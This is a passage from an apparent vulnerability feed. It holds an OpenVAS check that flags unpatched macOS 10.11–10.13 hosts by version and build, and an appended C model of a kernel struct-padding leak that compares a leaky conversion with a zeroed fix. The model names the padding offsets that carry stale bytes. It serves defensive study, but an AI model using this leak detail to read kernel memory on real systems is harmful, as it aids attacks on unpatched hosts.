"http://plugins.openvas.org/nasl.php?oid=1361412562310812401", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331)-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 
gb_apple_macosx_HT208331_02.nasl 14295 2019-03-18 20:16:46Z cfischer $\n#\n# Apple MacOSX Security Updates(HT208331)-02\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812401\");\n script_version(\"$Revision: 14295 $\");\n script_cve_id(\"CVE-2017-13868\", \"CVE-2017-13869\", \"CVE-2017-3735\", \"CVE-2017-13855\",\n\t\t\"CVE-2017-13844\", \"CVE-2017-9798\", \"CVE-2017-13847\", \"CVE-2017-13833\",\n\t\t\"CVE-2017-10002\", \"CVE-2017-13867\", \"CVE-2017-13862\", \"CVE-2017-7172\",\n \"CVE-2017-1000254\", \"CVE-2017-15422\", \"CVE-2017-7159\", \"CVE-2017-7162\",\n \"CVE-2017-13904\", \"CVE-2017-7173\", \"CVE-2017-7154\");\n script_bugtraq_id(100515, 100872, 101946);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 21:16:46 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:36 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331)-02\");\n\n 
script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update includes,\n\n - A validation issue was addressed with improved input sanitization.\n\n - An out-of-bounds read issue existed in X.509 IPAddressFamily parsing.\n\n - A type confusion issue was addressed with improved memory handling.\n\n - A memory corruption issue was addressed with improved memory handling.\n\n - Multiple issues were addressed by updating to version 2.4.28.\n\n - Multiple memory corruption issues were addressed through improved state management.\n\n - An out-of-bounds read was addressed with improved bounds checking.\n\n - An out-of-bounds read issue existed in the FTP PWD response parsing.\n\n - An integer overflow error.\n\n - An input validation issue existed in the kernel.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to read restricted memory, execute arbitrary code with system\n privileges.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions,\n 10.13.x through 10.13.1, 10.12.x through 10.12.6, 10.11.x through 10.11.6\");\n\n script_tag(name:\"solution\", value:\"Apply the appropriate security patch from\n the reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[1-3]\");\n 
exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[1-3]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.11\")\n{\n if(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\")\n {\n if(osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G18013\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nif(osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.12.6\")\n {\n if(osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G1114\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(osVer =~ \"^10\\.13\")\n{\n # affected range is 10.13 through 10.13.1 (see the affected tag), not only 10.13.1\n if(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.1\")){\n fix = \"10.13.2\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
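The struct-padding leak described in the getrusage entries above, modelled in userspace as an added example (this is not XNU code and not the Project Zero PoC): the field-by-field conversion in the style of munge_user64_rusage() that leaves padding untouched is placed beside a variant that zeroes the destination first, and a checker counts how many padding bytes would reach the caller. The struct layouts mirror the user64_timeval/user64_rusage definitions quoted in the report; the LP64 sizes (16-byte timeval, padding at offsets 12 and 28), the 0xAA stand-in for stale stack contents and the helper names are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>

/* Mirrors of the user64_timeval / user64_rusage layouts quoted in the report.
 * Assumed: LP64 ABI, so sizeof(struct user64_timeval) == 16 and 4 padding
 * bytes sit behind each tv_usec. Only the first three ru_* fields are
 * modelled; the rest do not change where the padding lives. */
typedef int64_t user64_time_t;
typedef int64_t user64_long_t;

struct user64_timeval {
    user64_time_t tv_sec;   /* 8 bytes */
    int32_t       tv_usec;  /* 4 bytes, then 4 bytes of compiler padding */
};

struct user64_rusage {
    struct user64_timeval ru_utime;
    struct user64_timeval ru_stime;
    user64_long_t         ru_maxrss;
};

/* Field-by-field conversion in the style of munge_user64_rusage(): the
 * padding behind each tv_usec is never written, so whatever the destination
 * already held goes out with the struct. */
static void munge_leaky(const struct rusage *in, struct user64_rusage *out)
{
    out->ru_utime.tv_sec  = in->ru_utime.tv_sec;
    out->ru_utime.tv_usec = (int32_t)in->ru_utime.tv_usec;
    out->ru_stime.tv_sec  = in->ru_stime.tv_sec;
    out->ru_stime.tv_usec = (int32_t)in->ru_stime.tv_usec;
    out->ru_maxrss        = in->ru_maxrss;
}

/* Hardened variant: zero the whole destination first, so padding reaches the
 * caller as zeroes no matter what the stack slot held before. */
static void munge_fixed(const struct rusage *in, struct user64_rusage *out)
{
    memset(out, 0, sizeof *out);
    munge_leaky(in, out);
}

/* Byte offset of the padding behind ru_utime.tv_usec (which == 0) or
 * ru_stime.tv_usec (which == 1): 12 and 28 on LP64, the offsets the PoC reads. */
size_t padding_offset(int which)
{
    size_t tv = which ? offsetof(struct user64_rusage, ru_stime)
                      : offsetof(struct user64_rusage, ru_utime);
    return tv + offsetof(struct user64_timeval, tv_usec) + sizeof(int32_t);
}

/* Number of padding bytes behind one tv_usec (4 on LP64). */
size_t padding_per_timeval(void)
{
    return sizeof(struct user64_timeval)
         - (offsetof(struct user64_timeval, tv_usec) + sizeof(int32_t));
}

/* Count padding bytes of *out that hold non-zero data, i.e. what a userspace
 * caller could read back after the copyout. */
size_t nonzero_padding_bytes(const struct user64_rusage *out)
{
    const unsigned char *p = (const unsigned char *)out;
    size_t n = 0;
    for (int which = 0; which < 2; which++) {
        size_t off = padding_offset(which);
        for (size_t i = 0; i < padding_per_timeval(); i++)
            n += (p[off + i] != 0);
    }
    return n;
}

/* Model one syscall: the handler's stack slot for the user64 struct still
 * holds bytes from an earlier call (constructed here as 0xAA), then the munge
 * runs. Returns how many padding bytes would be copied out non-zero. */
size_t leaked_padding_bytes(int use_fix)
{
    struct rusage in;                    /* constructed sample input */
    memset(&in, 0, sizeof in);
    in.ru_utime.tv_sec = 1; in.ru_utime.tv_usec = 2;
    in.ru_stime.tv_sec = 3; in.ru_stime.tv_usec = 4;
    in.ru_maxrss = 5;

    struct user64_rusage out;
    memset(&out, 0xAA, sizeof out);      /* stale "stack" contents */
    if (use_fix)
        munge_fixed(&in, &out);
    else
        munge_leaky(&in, &out);
    return nonzero_padding_bytes(&out);
}

int main(void)
{
    printf("padding slots at offsets %zu and %zu, %zu bytes each\n",
           padding_offset(0), padding_offset(1), padding_per_timeval());
    printf("leaky munge: %zu padding bytes leak\n", leaked_padding_bytes(0));
    printf("fixed munge: %zu padding bytes leak\n", leaked_padding_bytes(1));
    return 0;
}
```

On an LP64 build the leaky path reports 8 bytes and the fixed path 0. Clearing the out-buffer before per-field fills is the general remedy for kernel-to-user struct conversions; it also covers padding that a later change to the struct might introduce, which a fix that zeroes only the two known slots would not.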